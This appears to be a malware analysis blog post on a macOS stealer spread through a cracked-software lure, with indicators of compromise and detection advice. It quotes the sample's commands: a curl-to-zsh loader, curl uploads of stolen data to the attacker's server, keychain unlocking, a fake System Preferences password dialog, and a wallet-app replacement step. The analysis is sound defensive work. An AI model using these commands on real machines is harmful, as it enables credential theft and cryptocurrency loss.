Why you shouldn't try to install cracked software by copying and pasting into the terminal
Today we got our hands on a live macOS stealer sample that, while sharing the same ClickFix delivery mechanism used by AMOS campaigns, turns out to be a distinct stealer family with a few capabilities I hadn't seen documented before — most notably, in-place trojanization of Ledger and Trezor wallet apps.
The C2 infrastructure lives at alluringsites.com, a domain that was still fully operational at time of writing. Unlike the AMOS samples We've analyzed before, this one is completely unobfuscated — which makes it easy to read but no less dangerous.
Initial Infection Vector
The sample was found while searching for cracked macOS software — specifically, pirated versions of Parallels Desktop 26. The distributing site is artistapirata.app, which at time of discovery was hosting the malware at:
https://artistapirata.app/parallels-desktop-26-completa-descargar/
This is a textbook SEO-poisoning play: rank a "software crack" page high enough that users searching for pirated Parallels land on it, then deliver a ClickFix payload instead of (or alongside) the promised software. The target demographic — technically comfortable enough to try running a cracked hypervisor, but not security-conscious enough to question a terminal command — is well chosen.
The Redirect Chain
The infection chain involves several intermediary domains. At the bottom of the page, a button labelled "Acceder Al Contenido" triggers a window.open to:
https://jdhost798.it.com/?data=[dynamic_token]&uid=39&sid=28
jdhost798.it.com (Cloudflare-fronted) immediately returns a 302 to the actual ClickFix landing page:
https://info.thedailycrisp.com/?code=[session_code]&uid=39&sid=28
That page — titled "Download for macOS — DMG or via bash" — mimics a legitimate software download portal. It fetches the active payload dynamically from /get_commands.php, which returns a JSON object with OS-specific commands:
{
"windows": "winget install --id Linear.Linear -e",
"macos": "curl -kfsSL $(echo 'aHR0cDovL2FsbHVyaW5nc2l0ZXMuY29tL2N1cmwvMjVh...'|base64 -D)|zsh",
"updated_at": "2026-05-21 09:27:48"
}
This API-driven approach lets the operators rotate C2 infrastructure without touching the lure page — swap one URL in the database and every victim clicking the button from that point on gets a different payload. The page even embeds a tutorial video (hosted at files.briefset.com) showing the victim how to open Terminal and paste the command.
The macOS command decodes to:
http://alluringsites.com/curl/25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d
One secondary C2 was found hardcoded in the page's JavaScript as a fallback — thevenueapartments.com — but it was already returning 520 errors at time of analysis, suggesting the infrastructure rotated recently.
The Loader (Stage 1)
The response from the C2 is a short zsh script embedding a gzip-compressed, base64-encoded payload in a heredoc:
#!/bin/zsh
d19327=$(base64 -D <<'PAYLOAD_m61122146319169' | gunzip
H4sIAFCxDWoAA91WW2/bNhR+...
PAYLOAD_m61122146319169
)
eval "$d19327"
The eval is the only dangerous line. Decompress the payload and you get Stage 2 directly — no additional network request needed for the loader logic itself.
Stage 2: The Daemon
The decoded payload is a daemon_function that does two things:
Pulls Stage 3 (the actual AppleScript stealer) from the C2 and pipes it to
osascript, passing the user's password as a query parameter if already known:curl -k -s -H "api-key: 5190ef1733183a0dc63fb623357f56d6" \ "http://alluringsites.com/dynamic?txd=[token]&pwd=$1" | osascript
Exfiltrates the loot (
/tmp/osalogging.zip) back to the C2 in 10MB chunks via PUT requests to/gate:dd if=/tmp/osalogging.zip bs=1 skip=$offset count=$chunk_size | \ curl -X PUT "http://alluringsites.com/gate?buildtxd=[token]&upload_id=..."
It retries up to 8 times per chunk with exponential backoff before giving up.
The daemon runs in a background subshell (daemon_function "$@" &), so the parent shell exits immediately.
Stage 3: The AppleScript Stealer
This is where the real action is. The malware self-identifies in its own log file:
MacSync Stealer
Build Tag: nexus
Version: 1.1.2_release (x64_86 & ARM)
No Obfuscation
Unlike AMOS samples that use 400+ variables with arithmetic-decoded strings, this script is entirely plain AppleScript. Every function name, path, and capability is readable in clear text. Whether this is laziness or confidence, it doesn't matter much — the result is the same.
Password Phishing
The first thing the stealer does is kill Terminal (anti-forensics) and then grab the user's password via a fake System Preferences dialog:
display dialog "You should update the settings to launch the application." ¬
default answer "" with icon imagePath ¬
buttons {"Continue"} default button "Continue" ¬
giving up after 150 with title "System Preferences" with hidden answer
It validates the password using dscl . authonly <user> <pass> and loops indefinitely until it gets a correct one. Once validated, it:
- Unlocks the login keychain:
security unlock-keychain -p <pass> - Extracts the Chrome Safe Storage key:
security find-generic-password -wa "Chrome"
What It Steals
Browsers — Chromium family (Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Arc, Yandex, CocCoc, and every Chrome variant) plus Gecko family (Firefox, Zen, LibreWolf, Waterfox). For each profile it grabs Login Data, Cookies, Web Data, and Local Extension Settings.
Browser crypto wallet extensions — A hardcoded list of wallet extension IDs (MetaMask, Phantom, Coinbase Wallet, OKX, and many more) is targeted specifically within the extension settings folders.
Desktop wallets — 21 desktop wallet apps are targeted by path: Exodus, Electrum, Atomic Wallet, Guarda, Coinomi, Sparrow, Wasabi, Bitcoin Core, Armory, Electron Cash, Monero, Litecoin Core, Dash Core, Dogecoin Core, Electrum LTC, BlueWallet, Zengo, Trust Wallet, Ledger Live, Ledger Wallet, Trezor Suite.
Apple Notes — Grabs the full Notes database:
~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite
~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm
~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal
Safari — Cookies.binarycookies, Form Values (autofill), History.db.
File grabber — Desktop, Documents, and Downloads for files with these extensions up to a 10MB total cap: .pdf .docx .doc .wallet .key .keys .db .txt .seed .rtf .kdbx .pem .ovpn
Dotfiles — .zshrc, .zsh_history, .bash_history, .gitconfig — useful for attackers to understand the victim's dev environment and find any hardcoded credentials.
Telegram — Local Telegram data folder.
Keychains — Full keychain dump.
System info — system_profiler output (software, hardware, display data) written to the loot directory.
The Exfil Archive
Everything gets staged to /tmp/sync[random7digits]/ and then compressed with ditto:
ditto -c -k --sequesterRsrc /tmp/sync1234567/ /tmp/osalogging.zip
The lock file /tmp/macsync_[token].lock prevents the stealer from running twice simultaneously.
After collecting everything, the malware shows a decoy error dialog:
System Preferences
"Your Mac does not support this application. Try reinstalling or downloading the version for your system."
[ОК]
Note: that button label uses a Cyrillic "О", not a Latin "O". Small detail, potentially meaningful for attribution.
The Capability That Stands Out: Supply Chain Attack on Hardware Wallets
This is the part we found most interesting. After exfiltrating data, the malware checks whether Ledger Wallet, Ledger Live, or Trezor Suite are installed in /Applications. If any of them are present, it downloads a trojanized version from the C2 and replaces the app's app.asar and Info.plist in-place:
set LEDGERURL to "https://alluringsites.com/ledger/live/25a9dc50..."
-- downloads zip, unzips, replaces app contents, re-signs with ad-hoc identity
do shell script "codesign -f -s - " & quoted form of LEDGERDEST
The same pattern is applied to Trezor Suite. The app keeps running as normal — from the user's perspective nothing changed. But the next time the victim opens Ledger Live or Trezor Suite, they're running a compromised Electron app that can intercept seed phrases and transaction signing.
This is a significantly higher-impact capability than just stealing existing wallet data. Even if the victim's seed phrase isn't stored anywhere on disk, the trojanized wallet app can capture it the next time they enter it.
Differences from AMOS
| AMOS (rvdownloads campaign) | MacSync (alluringsites campaign) | |
|---|---|---|
| Obfuscation | Heavy (400+ arithmetic-decoded vars) | None |
| VM detection | Yes (system_profiler + serial numbers) | Not present |
| Password dialog | Fake system update | Fake System Preferences |
| Supply chain attack | No | Yes (Ledger, Trezor) |
| Persistence | LaunchAgent with inline osascript | Not observed |
| Exfil format | tar.gz via curl POST | zip via curl PUT (chunked) |
| C2 auth | None | api-key header |
| Self-identification | No | Yes ("MacSync Stealer / nexus") |
The delivery mechanism (ClickFix, squarespace-family lure domains, curl+base64+zsh) and the data targeting overlap heavily, but the codebase is distinct enough that We'd treat this as a related-but-separate family, or a fork sold/distributed by a different operator.
IOCs
Network
alluringsites.com
info.trendlytalk.com
http://alluringsites.com/curl/25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d
http://alluringsites.com/dynamic?txd=25a9dc50d50108ac13f1640103daeb22fc4eed07673a7a9d275f70d83b384b2d
http://alluringsites.com/gate?buildtxd=25a9dc50...
https://alluringsites.com/ledger/25a9dc50...
https://alluringsites.com/ledger/live/25a9dc50...
https://alluringsites.com/trezor/25a9dc50...
HTTP Header (C2 authentication)
api-key: 5190ef1733183a0dc63fb623357f56d6
Filesystem
/tmp/osalogging.zip
/tmp/sync[0-9]{7}/
/tmp/macsync_25a9dc50...lock
/tmp/25a9dc50...zip (Ledger/Trezor download)
/tmp/app.asar (trojanized electron payload)
Process Patterns
osascript [large script from stdin]
dscl . authonly <user> <pass>
security unlock-keychain -p <pass>
security find-generic-password -wa "Chrome"
ditto -c -k --sequesterRsrc /tmp/sync* /tmp/osalogging.zip
codesign -f -s - /Applications/Ledger*.app
dd if=/tmp/osalogging.zip ... | curl -X PUT .../gate
killall Terminal
Conclusion
MacSync Stealer is a capable, unobfuscated macOS stealer delivered through the same ClickFix campaigns that have been distributing AMOS variants. The lack of obfuscation makes it fast to analyze but doesn't limit what it does — the browser credential theft, Notes exfiltration, file grabbing, and keychain dumping are all standard fare.
What sets it apart is the hardware wallet supply chain attack. If you have Ledger or Trezor software installed, this malware doesn't just steal what's already on disk — it compromises the wallet app itself for future exploitation.
alluringsites.com is live at time of writing. Add it to your blocklists.
If you're building macOS defensive tooling, the process indicators are reliable detection signals — particularly the dscl . authonly call, the security unlock-keychain -p pattern, and chunked PUT uploads to non-CDN infrastructure.
Stay safe. 🍎🔒
Authored by Ismael Esquilichi and Pablo Redondo. Full samples available for threat research on request.